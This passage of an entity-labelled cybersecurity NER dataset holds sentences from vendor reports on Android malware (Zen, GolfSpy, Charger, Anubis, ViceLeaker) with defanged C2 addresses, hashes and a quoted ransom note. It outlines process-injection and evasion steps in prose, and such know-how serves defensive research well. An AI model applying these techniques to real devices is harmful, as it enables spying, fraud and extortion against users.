"spans": {}, "info": {"id": "cyner_train_002264", "source": "cyner_train"}} {"text": "This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps .", "spans": {}, "info": {"id": "cyner_train_002265", "source": "cyner_train"}} {"text": "It may even allow them to sell ad space directly to application developers .", "spans": {}, "info": {"id": "cyner_train_002266", "source": "cyner_train"}} {"text": "Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers .", "spans": {}, "info": {"id": "cyner_train_002268", "source": "cyner_train"}} {"text": "The first are games of very low quality that mimic the experience of popular mobile games .", "spans": {}, "info": {"id": "cyner_train_002270", "source": "cyner_train"}} {"text": "Instead of implementing very basic gameplay , the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK .", "spans": {}, "info": {"id": "cyner_train_002273", "source": "cyner_train"}} {"text": "In all cases , the ads are used to convince users to install other apps from different developer accounts , but written by the same group .", "spans": {}, "info": {"id": "cyner_train_002275", "source": "cyner_train"}} {"text": "Click fraud apps The authors ' tactics evolved from advertisement spam to real PHA ( Click Fraud ) .", "spans": {}, "info": {"id": "cyner_train_002277", "source": "cyner_train"}} {"text": "Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them .", "spans": {}, "info": {"id": "cyner_train_002278", "source": "cyner_train"}} {"text": "This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers , and impacts user experience by consuming their data plan resources .", "spans": {}, "info": 
{"id": "cyner_train_002280", "source": "cyner_train"}} {"text": "The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK .", "spans": {}, "info": {"id": "cyner_train_002281", "source": "cyner_train"}} {"text": "The command & control server ( C & C server ) returns the URL to click along with a very long list of additional parameters in JSON format .", "spans": {}, "info": {"id": "cyner_train_002282", "source": "cyner_train"}} {"text": "After rendering the ad on the screen , the app tries to identify the part of the advertisement website to click .", "spans": {}, "info": {"id": "cyner_train_002283", "source": "cyner_train"}} {"text": "If that part is found , the app loads Javascript snippets from the JSON parameters to click a button or other HTML element , simulating a real user click .", "spans": {}, "info": {"id": "cyner_train_002284", "source": "cyner_train"}} {"text": "Because a user interacting with an ad often leads to a higher chance of the user purchasing something , ad networks often \" pay per click '' to developers who host their ads .", "spans": {}, "info": {"id": "cyner_train_002285", "source": "cyner_train"}} {"text": "Therefore , by simulating fraudulent clicks , these developers are making money without requiring a user to click on an advertisement .", "spans": {}, "info": {"id": "cyner_train_002286", "source": "cyner_train"}} {"text": "It has been shortened for brevity .", "spans": {}, "info": {"id": "cyner_train_002288", "source": "cyner_train"}} {"text": "Using a publicly available rooting framework , the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device .", "spans": {}, "info": {"id": "cyner_train_002291", "source": "cyner_train"}} {"text": "Installing apps on the system partition makes it harder for the user to remove the app .", "spans": {}, "info": {"id": "cyner_train_002292", "source": "cyner_train"}} 
{"text": "This technique only works for unpatched devices running Android 4.3 or lower .", "spans": {"SYSTEM: Android 4.3": [[56, 67]]}, "info": {"id": "cyner_train_002293", "source": "cyner_train"}} {"text": "Devices running Android 4.4 and higher are protected by Verified Boot .", "spans": {"SYSTEM: Android 4.4": [[16, 27]]}, "info": {"id": "cyner_train_002294", "source": "cyner_train"}} {"text": "Zen 's rooting trojan apps target a specific device model with a very specific system image .", "spans": {"MALWARE: Zen": [[0, 3]]}, "info": {"id": "cyner_train_002295", "source": "cyner_train"}} {"text": "Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API .", "spans": {"SYSTEM: Android": [[85, 92]]}, "info": {"id": "cyner_train_002297", "source": "cyner_train"}} {"text": "In particular , these apps try to add an additional method called statistics ( ) into the Activity class .", "spans": {}, "info": {"id": "cyner_train_002298", "source": "cyner_train"}} {"text": "The only purpose of this method is to connect to the C & C server .", "spans": {}, "info": {"id": "cyner_train_002301", "source": "cyner_train"}} {"text": "The Zen trojan After achieving persistence , the trojan downloads additional payloads , including another trojan called Zen .", "spans": {"MALWARE: Zen": [[4, 7], [120, 123]]}, "info": {"id": "cyner_train_002302", "source": "cyner_train"}} {"text": "Zen requires root to work correctly on the Android operating system .", "spans": {"MALWARE: Zen": [[0, 3]], "SYSTEM: Android": [[43, 50]]}, "info": {"id": "cyner_train_002303", "source": "cyner_train"}} {"text": "The Zen trojan uses its root privileges to turn on accessibility service ( a service used to allow Android users with disabilities to use their devices ) for itself by writing to a system-wide setting value enabled_accessibility_services .", "spans": {"MALWARE: Zen": [[4, 7]], "SYSTEM: Android": [[99, 106]]}, "info": {"id": "cyner_train_002304", 
"source": "cyner_train"}} {"text": "The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services , chosen by checking the operating system version , to create new Google accounts .", "spans": {"SYSTEM: Android API": [[73, 84]], "ORGANIZATION: Google": [[196, 202]]}, "info": {"id": "cyner_train_002307", "source": "cyner_train"}} {"text": "This is done by opening the Google account creation process and parsing the current view .", "spans": {"ORGANIZATION: Google": [[28, 34]]}, "info": {"id": "cyner_train_002308", "source": "cyner_train"}} {"text": "The app then clicks the appropriate buttons , scrollbars , and other UI elements to go through account sign-up without user intervention .", "spans": {}, "info": {"id": "cyner_train_002309", "source": "cyner_train"}} {"text": "During the account sign-up process , Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA .", "spans": {"ORGANIZATION: Google": [[37, 43]]}, "info": {"id": "cyner_train_002310", "source": "cyner_train"}} {"text": "It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background .", "spans": {}, "info": {"id": "cyner_train_002312", "source": "cyner_train"}} {"text": "The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding .", "spans": {"MALWARE: Zen": [[4, 7]]}, "info": {"id": "cyner_train_002314", "source": "cyner_train"}} {"text": "It 's one of the strings - \" How you 'll sign in '' - that it looks for during the account creation process .", "spans": {}, "info": {"id": "cyner_train_002315", "source": "cyner_train"}} {"text": "The code snippet below shows part of the screen parsing process .", "spans": {}, "info": {"id": "cyner_train_002316", "source": "cyner_train"}} {"text": "Apart from injecting code to read the CAPTCHA , the app also injects 
its own code into the system_server process , which requires root privileges .", "spans": {}, "info": {"id": "cyner_train_002317", "source": "cyner_train"}} {"text": "This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process .", "spans": {}, "info": {"id": "cyner_train_002318", "source": "cyner_train"}} {"text": "The app also creates hooks to prevent the phone from rebooting , going to sleep or allowing the user from pressing hardware buttons during the account creation process .", "spans": {}, "info": {"id": "cyner_train_002319", "source": "cyner_train"}} {"text": "These hooks are created using the root access and a custom native code called Lmt_INJECT , although the algorithm for this is well known .", "spans": {}, "info": {"id": "cyner_train_002320", "source": "cyner_train"}} {"text": "Then the app finds a process id value for the process it wants to inject with code .", "spans": {}, "info": {"id": "cyner_train_002322", "source": "cyner_train"}} {"text": "This is done using a series of syscalls as outlined below .", "spans": {}, "info": {"id": "cyner_train_002323", "source": "cyner_train"}} {"text": "The \" source process '' refers to the Zen trojan running as root , while the \" target process '' refers to the process to which the code is injected and [ pid ] refers to the target process pid value .", "spans": {"MALWARE: Zen": [[38, 41]]}, "info": {"id": "cyner_train_002324", "source": "cyner_train"}} {"text": "The source process checks the mapping between a process id and a process name .", "spans": {}, "info": {"id": "cyner_train_002325", "source": "cyner_train"}} {"text": "This is done by reading the /proc/ [ pid ] /cmdline file .", "spans": {}, "info": {"id": "cyner_train_002326", "source": "cyner_train"}} {"text": "This very first step fails in Android 7.0 and higher , even with a root permission .", "spans": {"SYSTEM: 
Android 7.0": [[30, 41]]}, "info": {"id": "cyner_train_002327", "source": "cyner_train"}} {"text": "The /proc filesystem is now mounted with a hidepid=2 parameter , which means that the process can not access other process /proc/ [ pid ] directory .", "spans": {}, "info": {"id": "cyner_train_002328", "source": "cyner_train"}} {"text": "A ptrace_attach syscall is called .", "spans": {}, "info": {"id": "cyner_train_002329", "source": "cyner_train"}} {"text": "This allows the source process to trace the target .", "spans": {}, "info": {"id": "cyner_train_002330", "source": "cyner_train"}} {"text": "The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address .", "spans": {}, "info": {"id": "cyner_train_002331", "source": "cyner_train"}} {"text": "The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process .", "spans": {}, "info": {"id": "cyner_train_002334", "source": "cyner_train"}} {"text": "The source process writes the native shellcode into the memory region allocated by mmap .", "spans": {}, "info": {"id": "cyner_train_002336", "source": "cyner_train"}} {"text": "The source process changes the registers in the target process so that PC register points directly to the shellcode .", "spans": {}, "info": {"id": "cyner_train_002339", "source": "cyner_train"}} {"text": "This is done using the ptrace syscall .", "spans": {}, "info": {"id": "cyner_train_002340", "source": "cyner_train"}} {"text": "This diagram illustrates the whole process .", "spans": {}, "info": {"id": "cyner_train_002341", "source": "cyner_train"}} {"text": "Summary PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps .", "spans": {}, "info": {"id": "cyner_train_002342", "source": "cyner_train"}} {"text": "The app that resulted in the largest number of affected users was the click fraud version , which was installed over 170,000 times 
at its peak in February 2018 .", "spans": {}, "info": {"id": "cyner_train_002344", "source": "cyner_train"}} {"text": "The most affected countries were India , Brazil , and Indonesia .", "spans": {}, "info": {"id": "cyner_train_002345", "source": "cyner_train"}} {"text": "In most cases , these click fraud apps were uninstalled by the users , probably due to the low quality of the apps .", "spans": {}, "info": {"id": "cyner_train_002346", "source": "cyner_train"}} {"text": "If Google Play Protect detects one of these apps , Google Play Protect will show a warning to users .", "spans": {"SYSTEM: Google Play Protect": [[3, 22], [51, 70]]}, "info": {"id": "cyner_train_002347", "source": "cyner_train"}} {"text": "We are constantly on the lookout for new threats and we are expanding our protections .", "spans": {}, "info": {"id": "cyner_train_002348", "source": "cyner_train"}} {"text": "You can check the status of Google Play Protect on your device : Open your Android device 's Google Play Store app .", "spans": {"SYSTEM: Google Play Protect": [[28, 47]], "SYSTEM: Google Play Store": [[93, 110]]}, "info": {"id": "cyner_train_002350", "source": "cyner_train"}} {"text": "Tap Menu > Play Protect .", "spans": {}, "info": {"id": "cyner_train_002351", "source": "cyner_train"}} {"text": "Look for information about the status of your device .", "spans": {}, "info": {"id": "cyner_train_002352", "source": "cyner_train"}} {"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04", "spans": {}, "info": {"id": "cyner_train_002353", "source": "cyner_train"}} {"text": "Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register 
eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign ‘ Bouncing Golf ’ Affects Middle East We uncovered a cyberespionage campaign targeting Middle", "spans": {"MALWARE: Zen": [[103, 106]], "MALWARE: Bouncing Golf": [[214, 227]]}, "info": {"id": "cyner_train_002354", "source": "cyner_train"}} {"text": "Malicious codes are embedded in apps that the operators repackaged from legitimate applications .", "spans": {}, "info": {"id": "cyner_train_002358", "source": "cyner_train"}} {"text": "Monitoring the command and control ( C & C ) servers used by Bouncing Golf , we ’ ve so far observed more than 660 Android devices infected with GolfSpy .", "spans": {"MALWARE: Bouncing Golf": [[61, 74]], "SYSTEM: Android": [[115, 122]], "MALWARE: GolfSpy": [[145, 152]]}, "info": {"id": "cyner_train_002359", "source": "cyner_train"}} {"text": "The campaign ’ s attack vector is also interesting .", "spans": {}, "info": {"id": "cyner_train_002361", "source": "cyner_train"}} {"text": "Also of note is Bouncing Golf ’ s possible connection to a previously reported mobile cyberespionage campaign that researchers named Domestic Kitten .", "spans": {"MALWARE: Bouncing Golf": [[16, 29]], "MALWARE: Domestic Kitten": [[133, 148]]}, "info": {"id": "cyner_train_002364", "source": "cyner_train"}} {"text": "The strings of code , for one , are similarly structured .", "spans": {}, "info": {"id": "cyner_train_002365", "source": "cyner_train"}} {"text": "The data targeted for theft also have similar formats .", "spans": {}, "info": {"id": "cyner_train_002366", "source": "cyner_train"}} {"text": "GolfSpy ’ s infection chain GolfSpy 's Potential Impact Given GolfSpy ’ s information-stealing capabilities , this malware can effectively hijack an infected Android device .", "spans": {"MALWARE: GolfSpy": [[0, 7], [28, 35], [62, 69]], "SYSTEM: Android": [[158, 165]]}, "info": {"id": "cyner_train_002368", "source": "cyner_train"}} {"text": "Here is a list of information that GolfSpy 
steals : Device accounts List of applications installed in the device Device ’ s current running processes Battery status Bookmarks/Histories of the device ’ s default browser Call logs and records Clipboard contents Contacts , including those in VCard format Mobile operator information Files stored on SDcard Device location List of image , audio , and video files stored on the device Storage and memory information Connection information Sensor information SMS messages Pictures GolfSpy also has a function that lets it connect to a remote server to fetch and perform commands", "spans": {"MALWARE: GolfSpy": [[35, 42], [526, 533]]}, "info": {"id": "cyner_train_002369", "source": "cyner_train"}} {"text": ", including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware .", "spans": {}, "info": {"id": "cyner_train_002370", "source": "cyner_train"}} {"text": "Technical Analysis The repackaged applications are embedded with malicious code , which can be found in the com.golf package .", "spans": {}, "info": {"id": "cyner_train_002371", "source": "cyner_train"}} {"text": "These repackaged apps pose as communication , news , lifestyle , book , and reference apps popularly used in the Middle East .", "spans": {}, "info": {"id": "cyner_train_002372", "source": "cyner_train"}} {"text": "The GolfSpy malware embedded in the apps is hardcoded with an internal name used by the attacker .", "spans": {"MALWARE: GolfSpy": [[4, 11]]}, "info": {"id": "cyner_train_002373", "source": "cyner_train"}} {"text": "Icons of the apps that Bouncing Golf ’ s operators repackaged ( top ) and a comparison of packages between the original legitimate app ( bottom left ) and GolfSpy ( bottom right ) Figure 3 .", "spans": {"MALWARE: Bouncing Golf": [[23, 36]], "MALWARE: GolfSpy": [[155, 162]]}, "info": 
{"id": "cyner_train_002375", "source": "cyner_train"}} {"text": "GolfSpy ’ s configurations encoded by a custom algorithm ( right ) and its decoded version ( left ) As shown in Figure 3 , GolfSpy ’ s configurations ( e.g. , C & C server , secret keys ) are encoded by a customized algorithm .", "spans": {"MALWARE: GolfSpy": [[0, 7], [123, 130]]}, "info": {"id": "cyner_train_002376", "source": "cyner_train"}} {"text": "The information is written into a file on the device .", "spans": {}, "info": {"id": "cyner_train_002378", "source": "cyner_train"}} {"text": "Code snippet showing GolfSpy generating UUID The value of % is in the range of 1-9 or a-j .", "spans": {"MALWARE: GolfSpy": [[21, 28]]}, "info": {"id": "cyner_train_002381", "source": "cyner_train"}} {"text": "Each value represents a different type of data to steal from the device : Value Data Type 1 Accounts 2 Installed APP list 3 Running processes list 4 Battery status 5 Browser bookmarks and histories 6 Call logs 7 Clipboard 8 Contacts 9 Mobile operator information a File list on SD card b Location c Image list d Audio list e Video list f Storage and memory information g Connection information h Sensors information i SMS messages j VCard format contacts Table 1 .", "spans": {}, "info": {"id": "cyner_train_002382", "source": "cyner_train"}} {"text": "The type of data corresponding to the value coded in GolfSpy Figure 5 shows the code snippets that are involved in monitoring and recording the device ’ s phone call .", "spans": {"MALWARE: GolfSpy": [[53, 60]]}, "info": {"id": "cyner_train_002383", "source": "cyner_train"}} {"text": "It will also take a photo using the device ’ s front camera when the user wakes the device .", "spans": {}, "info": {"id": "cyner_train_002384", "source": "cyner_train"}} {"text": "GolfSpy encrypts all the stolen data using a simple XOR operation with a pre-configured key before sending it to the C & C server using the HTTP POST method .", "spans": {"MALWARE: GolfSpy": [[0, 7]]}, 
"info": {"id": "cyner_train_002386", "source": "cyner_train"}} {"text": "Code snippets showing how GolfSpy monitors phone calls via register receiver ( top left ) , its actions when the device is woken up ( top right ) , and how it encrypts the stolen data ( bottom ) The malware retrieves commands from the C & C server via HTTP , and attackers can steal specific files on the infected device .", "spans": {"MALWARE: GolfSpy": [[26, 33]]}, "info": {"id": "cyner_train_002388", "source": "cyner_train"}} {"text": "The command is a constructed string split into three parts using \" \" as a separator .", "spans": {}, "info": {"id": "cyner_train_002389", "source": "cyner_train"}} {"text": "The first part is the target directory , the second is a regular expression used to match specific files , while the last part is an ID .", "spans": {}, "info": {"id": "cyner_train_002390", "source": "cyner_train"}} {"text": "The small or limited number is understandable given the nature of this campaign , but we also expect it to increase or even diversify in terms of distribution .", "spans": {}, "info": {"id": "cyner_train_002397", "source": "cyner_train"}} {"text": "Bouncing Golf ’ s operators also try to cover their tracks .", "spans": {"MALWARE: Bouncing Golf": [[0, 13]]}, "info": {"id": "cyner_train_002399", "source": "cyner_train"}} {"text": "The C & C server IP addresses used also appear to be disparate , as they were located in many European countries like Russia , France , Holland , and Germany .", "spans": {}, "info": {"id": "cyner_train_002401", "source": "cyner_train"}} {"text": "It ’ s not a definite correlation , but Bouncing Golf also seems to have a connection with Domestic Kitten due to similarities we found in their code .", "spans": {"MALWARE: Bouncing Golf": [[40, 53]], "MALWARE: Domestic Kitten": [[91, 106]]}, "info": {"id": "cyner_train_002402", "source": "cyner_train"}} {"text": "For example , the Android malware that both deploy share the same strings of code for 
their decoding algorithm .", "spans": {"SYSTEM: Android": [[18, 25]]}, "info": {"id": "cyner_train_002403", "source": "cyner_train"}} {"text": "The data that Domestic Kitten steals follows a similar format with Bouncing Golf ’ s , with each type of data having a unique identifying character .", "spans": {"MALWARE: Domestic Kitten": [[14, 29]], "MALWARE: Bouncing Golf": [[67, 80]]}, "info": {"id": "cyner_train_002404", "source": "cyner_train"}} {"text": "It ’ s also worth noting that both campaigns repackage apps that are commonly used in their target ’ s countries , such as Telegram , Kik , and Plus messaging apps .", "spans": {"SYSTEM: Telegram": [[123, 131]], "SYSTEM: Kik": [[134, 137]], "SYSTEM: Plus": [[144, 148]]}, "info": {"id": "cyner_train_002405", "source": "cyner_train"}} {"text": "Code snippets showing : the decoding algorithm shared by both Bouncing Golf and Domestic Kitten ( top ) , the format of data that Domestic Kitten ’ s malware targets to steal ( center ) , and how both Bouncing Golf ( bottom left ) and Domestic Kitten ( bottom right ) use \" \" as a separator in their command strings .", "spans": {"MALWARE: Bouncing Golf": [[62, 75], [201, 214]], "MALWARE: Domestic Kitten": [[80, 95], [130, 145], [235, 250]]}, "info": {"id": "cyner_train_002407", "source": "cyner_train"}} {"text": "As we ’ ve seen in last year ’ s mobile threat landscape , we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity , employing tried-and-tested techniques to lure unwitting users .", "spans": {}, "info": {"id": "cyner_train_002408", "source": "cyner_train"}} {"text": "The extent of information that these kinds of threats can steal is also significant , as it lets attackers virtually take over a compromised device .", "spans": {}, "info": {"id": "cyner_train_002409", "source": "cyner_train"}} {"text": "Users should adopt best practices , while organizations should ensure that they balance the need for mobility and the importance of 
security .", "spans": {}, "info": {"id": "cyner_train_002410", "source": "cyner_train"}} {"text": "Several weeks ago , Check Point Mobile Threat Prevention detected and quarantined the Android device of an unsuspecting customer employee who downloaded and installed a 0day mobile ransomware from Google Play dubbed “ Charger. ” This incident demonstrates how malware can be a dangerous threat to your business , and how advanced behavioral detection fills mobile security gaps attackers use to penetrate entire networks .", "spans": {"ORGANIZATION: Check Point": [[20, 31]], "SYSTEM: Android": [[86, 93]], "SYSTEM: Google Play": [[197, 208]], "MALWARE: Charger.": [[218, 226]]}, "info": {"id": "cyner_train_002414", "source": "cyner_train"}} {"text": "Charger was found embedded in an app called EnergyRescue .", "spans": {"MALWARE: Charger": [[0, 7]], "MALWARE: EnergyRescue": [[44, 56]]}, "info": {"id": "cyner_train_002415", "source": "cyner_train"}} {"text": "If granted , the ransomware locks the device and displays a message demanding payment : You need to pay for us , otherwise we will sell portion of your personal information on black market every 30 minutes .", "spans": {}, "info": {"id": "cyner_train_002417", "source": "cyner_train"}} {"text": "WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT .", "spans": {}, "info": {"id": "cyner_train_002418", "source": "cyner_train"}} {"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER !", "spans": {}, "info": {"id": "cyner_train_002419", "source": "cyner_train"}} {"text": "TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS !", "spans": {}, "info": {"id": "cyner_train_002420", "source": "cyner_train"}} {"text": "WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and download all of your personal data .", "spans": {}, "info": {"id": "cyner_train_002421", "source": "cyner_train"}} {"text": "All information about your social 
networks , Bank accounts , Credit Cards .", "spans": {}, "info": {"id": "cyner_train_002422", "source": "cyner_train"}} {"text": "We collect all data about your friends and family .", "spans": {}, "info": {"id": "cyner_train_002423", "source": "cyner_train"}} {"text": "The ransom demand for 0.2 Bitcoins ( roughly $ 180 ) is a much higher ransom demand than has been seen in mobile ransomware so far .", "spans": {}, "info": {"id": "cyner_train_002424", "source": "cyner_train"}} {"text": "By comparison , the DataLust ransomware demanded merely $ 15 .", "spans": {"MALWARE: DataLust": [[20, 28]]}, "info": {"id": "cyner_train_002425", "source": "cyner_train"}} {"text": "Payments are made to a specific Bitcoin account , but we haven ’ t identified any payments so far .", "spans": {"SYSTEM: Bitcoin": [[32, 39]]}, "info": {"id": "cyner_train_002426", "source": "cyner_train"}} {"text": "Adware commonly found on Play collects profits from ad networks , but mobile ransomware inflicts direct harm to users .", "spans": {}, "info": {"id": "cyner_train_002427", "source": "cyner_train"}} {"text": "Similar to other malware seen in the past , Charger checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine , Russia , or Belarus .", "spans": {"MALWARE: Charger": [[44, 51]]}, "info": {"id": "cyner_train_002429", "source": "cyner_train"}} {"text": "Charger , however , uses a heavy packing approach which it harder for the malware to stay hidden , so it must compensate with other means .", "spans": {"MALWARE: Charger": [[0, 7]]}, "info": {"id": "cyner_train_002432", "source": "cyner_train"}} {"text": "The developers of Charger gave it everything they had to boost its evasion capabilities and so it could stay hidden on Google Play for as long as possible .", "spans": {"MALWARE: Charger": [[18, 25]], "SYSTEM: Google Play": [[119, 130]]}, "info": {"id": "cyner_train_002433", "source": "cyner_train"}} {"text": "The malware uses several 
advanced techniques to hide its real intentions and makes it harder to detect .", "spans": {}, "info": {"id": "cyner_train_002434", "source": "cyner_train"}} {"text": "It encodes strings into binary arrays , making it hard to inspect them .", "spans": {}, "info": {"id": "cyner_train_002435", "source": "cyner_train"}} {"text": "It loads code from encrypted resources dynamically , which most detection engines can not penetrate and inspect .", "spans": {}, "info": {"id": "cyner_train_002436", "source": "cyner_train"}} {"text": "It checks whether it is being run in an emulator before it starts its malicious activity .", "spans": {}, "info": {"id": "cyner_train_002438", "source": "cyner_train"}} {"text": "Emulator and location conditions for the malware ’ s activity Check Point Mobile Threat Prevention customers are protected from Charger and similar malware .", "spans": {"ORGANIZATION: Check Point": [[62, 73]], "MALWARE: Charger": [[128, 135]]}, "info": {"id": "cyner_train_002440", "source": "cyner_train"}} {"text": "Check Point ’ s Analysis and Response Team ( ART ) disclosed the finding to Android ’ s Security team who took the appropriate security steps to remove the infected app and added the malware to Android ’ s built-in protection mechanisms .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "SYSTEM: Android": [[76, 83], [194, 201]]}, "info": {"id": "cyner_train_002441", "source": "cyner_train"}} {"text": "With mobile devices increasingly used in the corporate environment , thanks to the popularity of BYOD policies , this malware has the potential to cause serious harm , mostly to consumers , and businesses that allow the installation of unsigned applications .", "spans": {}, "info": {"id": "cyner_train_002445", "source": "cyner_train"}} {"text": "Let ’ s take a closer look at the suspicious file .", "spans": {}, "info": {"id": "cyner_train_002448", "source": "cyner_train"}} {"text": "Figure 1 – Phishing Email When the email link is opened from an Android 
device , an APK file ( Fattura002873.apk ) , is downloaded .", "spans": {"SYSTEM: Android": [[64, 71]]}, "info": {"id": "cyner_train_002449", "source": "cyner_train"}} {"text": "Upon opening the file , the user is asked to enable “ Google Play Protect ” as shown in Figure 2 .", "spans": {"SYSTEM: Google Play": [[54, 65]]}, "info": {"id": "cyner_train_002450", "source": "cyner_train"}} {"text": "However , this is not a genuine “ Google Play Protect ” screen ; instead it gives the app all the permissions it needs while simultaneously disabling the actual Google Play Protect .", "spans": {"SYSTEM: Google Play": [[34, 45]], "SYSTEM: Google Play Protect": [[161, 180]]}, "info": {"id": "cyner_train_002451", "source": "cyner_train"}} {"text": "The malware mainly targets banking and financial applications , but also looks for popular shopping apps such as eBay or Amazon .", "spans": {"ORGANIZATION: eBay": [[113, 117]], "ORGANIZATION: Amazon": [[121, 127]]}, "info": {"id": "cyner_train_002453", "source": "cyner_train"}} {"text": "A full list of targeted applications is included in the IOC section at the end of this post .", "spans": {}, "info": {"id": "cyner_train_002454", "source": "cyner_train"}} {"text": "Figure 4 – Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes", "spans": {"SYSTEM: Twitter": [[541, 548]], "SYSTEM: Telegram": [[553, 561]]}, "info": {"id": "cyner_train_002456", "source": "cyner_train"}} {"text": "a 
keylogger that works in every app installed on the Android device .", "spans": {"SYSTEM: Android": [[53, 60]]}, "info": {"id": "cyner_train_002457", "source": "cyner_train"}} {"text": "However , the keylogger needs to be specifically enabled by a command sent from the C2 server .", "spans": {}, "info": {"id": "cyner_train_002458", "source": "cyner_train"}} {"text": "The keylogger can track three different events ( Figure 5 ) : TYPE_VIEW_CLICKED Represents the event of clicking on a View-like Button , CompoundButton , etc .", "spans": {}, "info": {"id": "cyner_train_002459", "source": "cyner_train"}} {"text": "TYPE_VIEW_FOCUSED Represents the event of setting input focus of a View .", "spans": {}, "info": {"id": "cyner_train_002460", "source": "cyner_train"}} {"text": "Figure 5 – Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module .", "spans": {"MALWARE: Anubis": [[86, 92]]}, "info": {"id": "cyner_train_002462", "source": "cyner_train"}} {"text": "It adds the file extension .AnubisCrypt to each encrypted file and sends it to the C2 .", "spans": {}, "info": {"id": "cyner_train_002464", "source": "cyner_train"}} {"text": "Figure 7 – C2 As seen in Figure 8 , this version of Anubis is built to run on several iterations of the Android operating system , dating back to version 4.0.3 , which was released in 2012 .", "spans": {"MALWARE: Anubis": [[52, 58]], "SYSTEM: Android": [[104, 111]]}, "info": {"id": "cyner_train_002466", "source": "cyner_train"}} {"text": "Figure 8 – Android requirements Android malware has been around for many years and will be with us for the foreseeable future .", "spans": {"SYSTEM: Android": [[11, 18], [32, 39]]}, "info": {"id": "cyner_train_002467", "source": "cyner_train"}} {"text": "APK files will not natively open in an environment other than an Android device .", "spans": {"SYSTEM: Android": [[65, 72]]}, "info": {"id": "cyner_train_002469", "source": "cyner_train"}} {"text": "With the 
increased use of Android phones in business environments , it is important to defend against these threats by ensuring devices are kept current with the latest updates .", "spans": {"SYSTEM: Android": [[26, 33]]}, "info": {"id": "cyner_train_002470", "source": "cyner_train"}} {"text": "Limiting app installations on corporate devices , as well as ensuring that applications are created by trusted developers on official marketplaces , can help in reducing the risk of infection as well .", "spans": {}, "info": {"id": "cyner_train_002471", "source": "cyner_train"}} {"text": "Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims ; and a hash of the APK involved ( Android application ) was tagged in our sample feed for inspection .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "SYSTEM: Android": [[130, 137]]}, "info": {"id": "cyner_train_002473", "source": "cyner_train"}} {"text": "Once we looked into the file , we quickly found out that the inner-workings of the APK included a malicious payload , embedded in the original code of the application .", "spans": {}, "info": {"id": "cyner_train_002474", "source": "cyner_train"}} {"text": "This was an original spyware program , designed to exfiltrate almost all accessible information .", "spans": {}, "info": {"id": "cyner_train_002475", "source": "cyner_train"}} {"text": "Researchers from Bitdefender also released an analysis of one of the samples in a blogpost .", "spans": {"ORGANIZATION: Bitdefender": [[17, 28]]}, "info": {"id": "cyner_train_002477", "source": "cyner_train"}} {"text": "Although something had already been published , we decided to do something different with the data we acquired .", "spans": {}, "info": {"id": "cyner_train_002478", "source": "cyner_train"}} {"text": "We decided to call the operation “ ViceLeaker ” , because of strings and variables in its code .", "spans": {"MALWARE: ViceLeaker": [[35, 45]]}, "info": {"id": "cyner_train_002480", "source": 
"cyner_train"}} {"text": "Mobile ViceLeaker The following table shows meta information on the observed samples , including compiler timestamps : MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28 [ .", "spans": {"MALWARE: ViceLeaker": [[7, 17]]}, "info": {"id": "cyner_train_002481", "source": "cyner_train"}} {"text": "] 251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49 [ .", "spans": {}, "info": {"id": "cyner_train_002482", "source": "cyner_train"}} {"text": "] 205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49 [ .", "spans": {}, "info": {"id": "cyner_train_002483", "source": "cyner_train"}} {"text": "] 205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60 [ .", "spans": {}, "info": {"id": "cyner_train_002484", "source": "cyner_train"}} {"text": "Original code of the APK on the left , versus injected APK on the right The analysis of the APK was rather interesting , because some of the actions were very common spyware features , such as the exfiltration of SMS messages , call logs and other data .", "spans": {}, "info": {"id": 